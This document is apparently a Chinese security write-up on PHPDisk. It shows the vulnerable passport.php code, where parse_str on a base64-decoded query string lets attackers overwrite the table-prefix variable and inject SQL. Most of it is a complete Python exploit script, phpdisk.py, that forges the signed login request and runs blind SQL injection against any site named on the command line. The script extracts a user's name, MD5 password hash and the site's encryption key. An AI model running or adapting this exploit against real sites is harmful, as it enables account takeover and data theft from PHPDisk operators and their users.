代码审核

文件 plugins\phpdisk_client\passport.php

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
$str = $_SERVER['QUERY_STRING'];

if($str){
parse_str(base64_decode($str));// 触发函数
}else{
exit('Error Param');
}
/*$username = trim(gpc('username','G',''));
$password = trim(gpc('password','G',''));
$sign = trim(gpc('sign','G',''));*/

if($sign!=strtoupper(md5($action.$username.$password))){
exit('No data,Code:2!');
}

$username = is_utf8() ? convert_str('gbk','utf-8',$username) : $username;

if($action=='passportlogin'){

$rs = $db->fetch_one_array("select userid,gid,username,password,email from {$tpf}users where username='$username' and password='$password' limit 1"); //覆盖tpf

phpdisk.py exploit

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
#===============================================================================
# Id :phpdisk.y
# Author:Yaseng
#===============================================================================
import sys, urllib2, time, os , Queue, msvcrt, threading,re,base64,md5,hashlib,binascii,cookielib

def cslogo():
print '''
___ ___ ____ ____ ____ __ __ _ _
/ __)/ _ \( _ \( ___)( _ \( ) /__\ ( \/ )
( (__( (_) ))(_) ))__) )___/ )(__ /(__)\ \ /
\___)\___/(____/(____)(__) (____)(__)(__)(__)
Name:phpdisk bind sql injection exploit
Author:Yaseng [yaseng@uauc.net]
Usage:phpdisk.py site[www.yaseng.me] id[1]
'''

# show message
def msg(text, type=0):
if type == 0:
str_def = "[*]"
elif type == 1:
str_def = "[+]"
else:
str_def = "[-]";
print str_def + text;

# get url data
def get_data(url):
try:
r = urllib2.urlopen(url, timeout=10)
return r.read()
except :
return 0
def b(url):
if get_data(url).find("ssport Err",0) != -1 :
return 0
return 1

def make_plyload(payload):
return target+"?"+base64.b64encode("username=1&password=1&action=passportlogin&tpf="+payload+"&sign="+md5.new("passportlogin"+"1"+"1").hexdigest().upper())

def get_username():

msg("get username ...")
global pass_list
len=0
for i in range(40) :
if b(make_plyload("pd_users WHERE 1 and (SELECT LENGTH(username) from pd_users where userid=%d )= %d #" % (uid,i))):
len=i
msg("username length:%d" % len,1)
break
global key_list
key_list=['0','1','2','3','4','5','6','7','8','9']
key_list+=map(chr,range(97,123))
username=""
for i in range(len) :
for key in key_list :
t=key
if type(key) != int :
t="0x"+binascii.hexlify(key)
if(b(make_plyload(" pd_users WHERE 1 and (SELECT substr(username,%d,1) from pd_users where userid=%d )=%s #" % (i+1,uid,t)))) :
msg("username [%d]:%s" % (i+1,key))
username+=key
break
msg("username:"+username,1)
return username

def get_password():

pass_list=['0','1','2','3','4','5','6','7','8','9','a','b','c','d','e','f']
password=""
for i in range(32) :
for key in pass_list :
t=key
if type(key) != int :
t="0x"+binascii.hexlify(key)
if(b(make_plyload(" pd_users WHERE 1 and (SELECT substr(password,%d,1) from pd_users where userid=%d )= %s #" % (i+1,uid,t)))) :
msg("password [%d]:%s" % (i+1,key))
password+=key
break
msg("username:"+password,1)
return password

def get_encrypt_key():

msg("get encrypt_key ...")
global pass_list
pass_list=map(chr,range(97,123))
len=0
for i in range(40) :
if b(make_plyload("pd_users WHERE 1 and ( SELECT LENGTH(value) from pd_settings where vars=0x656e63727970745f6b6579 )=%d #23" % i)):
len=i
msg("encrypt_key length:%d" % len,1)
break
global key_list
key_list=['0','1','2','3','4','5','6','7','8','9']
key_list+=map(chr,range(65,91)+range(97,123))
encrypt_key=""
for i in range(len) :
for key in key_list :
t=key
if type(key) != int :
t="0x"+binascii.hexlify(key)
if(b(make_plyload(" pd_users WHERE 1 and ( SELECT binary(substr(value,%d,1)) from pd_settings where vars=0x656e63727970745f6b6579 ) = %s #" % (i+1,t)))) :
msg("key [%d]:%s" % (i+1,key))
encrypt_key+=key
break
msg("encrypt_key:"+encrypt_key,1)
return encrypt_key

if __name__ == '__main__':

cslogo()
if len(sys.argv) > 1 :
site=sys.argv[1];
global target
global uid
try :
uid=int(sys.argv[2]);
except :
uid =1
target=site+"/plugins/phpdisk_client/passport.php"
msg("exploit:"+site)
#print get_data(make_plyload(" pd_users WHERE 1 and ( SELECT substr(value,2,1) from pd_settings where vars=0x656e63727970745f6b6579 ) = 9 %23"))
if get_data(target) :
username=get_username()
if len(username) > 0 :
password=get_password()
if len(password) == 32 :
msg("Succeed: username:%s password:%s" % (username,password),1)
else :
msg("vulnerability not exits",2);
exit();

使用演示